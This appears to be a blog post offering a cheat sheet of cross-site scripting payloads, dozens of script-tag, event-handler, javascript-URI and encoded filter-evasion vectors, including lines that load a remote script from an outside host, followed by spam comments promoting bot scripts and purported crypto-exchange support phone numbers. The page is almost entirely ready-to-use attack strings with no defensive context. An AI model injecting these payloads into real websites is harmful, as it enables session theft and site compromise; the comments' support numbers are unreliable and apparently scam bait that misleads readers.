Script Tags Cheat Sheet

Popping Alert Box


<script>alert(1)</script>
<script>alert('1')</script>
<script>alert(`1`)</script>
<script>alert("1")</script>
<img src =x onerror=prompt[1]>
<img src =x onerror=prompt['1']>
<img src =x onerror=prompt["1"]>
<img src =x onerror=prompt[`1`]>
<img src =x onerror=prompt(1)>
<img src =x onerror=prompt('1')>
<img src =x onerror=prompt("1")>
<img src =x onerror=prompt(`1`)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("TEST, 'XSS'")`>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG SRC="javascript:alert('XSS')"
 </script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<svg/onload=alert('XSS')>
<svg/onload=alert('XSS')>
<BODY ONLOAD=alert('XSS')>
<BR SIZE="&{alert('XSS')}">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
 <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

"><h1><script>alert("MESSAGE")</script>123</h1>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script>
"><h1><IMG SRC="javascript:alert('XSS');"></h1>
"><h1><IMG SRC="jav&#x09;ascript:alert('XSS');"></h1>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>"></h1>

<body onload=alert('test1')>
<IMG SRC=j&#X41vascript:alert('test2')>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
<video poster=javascript:alert(1)//></video>
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
<video><source onerror="alert(1)">
<video onerror="alert(1)"><source></source></video>
<form><button formaction="javascript:alert(1)">X</button>
<body oninput=alert(1)><input autofocus>
<iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />
<picture><source srcset="x"><img onerror="alert(1)"></picture>
<picture><img srcset="x" onerror="alert(1)"></picture>
<img srcset=",,,,,x" onerror="alert(1)">
<details open ontoggle="alert(1)">
<video src onratechange="alert(1)">
<frameset onload=alert(1)>

7 comments:

  1. wordpress video player plugin

    Get the best WordPress plugin for the youtube video player and video background. We offer the many ways to add videos to your WordPress site as well as to play them. Find here the best WordPress video player plugin.

    to get more - http://www.videoplayerhtml5.com/services/

    ReplyDelete
  2. Free Premium Script PHP
    - Youtube Mp3 Grabber
    - Anime Grabber
    - Script Bot Facebook
    - Script Bot Twitter
    - Script Auto Follow Instagram
    - Script Auto Follow Facebook

    Dan lain lain nya

    Kunjungi ya

    https://insideheartz.id
    https://insideheartz.id
    https://insideheartz.id

    https://insideheartz.id

    ReplyDelete
  3. As far as the registering and depositing on Binance is concerned, then it obviously combines some steps. Users are required to execute those steps in proper way to accomplish the purpose at deposit time. But various users have been found to make a complaint regarding troubles in executing the associated processing time. In that situation, they may immediately call our Binance phone number to ask for assistance which is easily reachable anytime. Just ping on our expert’s team which is always at your service and gets full information about the error.

    ReplyDelete
  4. The unavailability of transactional review on Binance is literally an embarrassing issue and hence need to be resolved as soon as possible. For this purpose, users are free to contact our service team through the provided number that is accessible at all times. Such kind of problem usually happens due to some tech issue. Generally, users could not know about the issues themselves and hence they to take help of support team. Users will need to dial our Binance support number only to get the relevant solution.

    ReplyDelete
  5. Is your deposit still on hold in your Gemini account? Do you know how to fix this error as it is quite annoying and disturbing? In order to get rid of this error, feel free to fetch best solutions and remedies from the skilled experts team who are available day and night and can be reached Gemini customer service number. The elite professionals are approachable every time without any discontinuity. Connect with the team and get verified solutions from the professional in no time.

    ReplyDelete
  6. Is it accurate to say that you are confronting mistake in getting an email confirmation message in Bithumb? Do you know the ways and strategies to assess the mistake totally from your Bithumb account? To expel every one of the blunders in Bithumb identified with any kind of question, you can dial Bithumb phone number which is receptive at each purpose of an hour and you can get in touch with them whenever to fix your issues. The specialists realize how to manage the email confirmation in the immaculate way. You can move toward the client care by straightforwardly approaching their toll free number for moment and available arrangements.

    ReplyDelete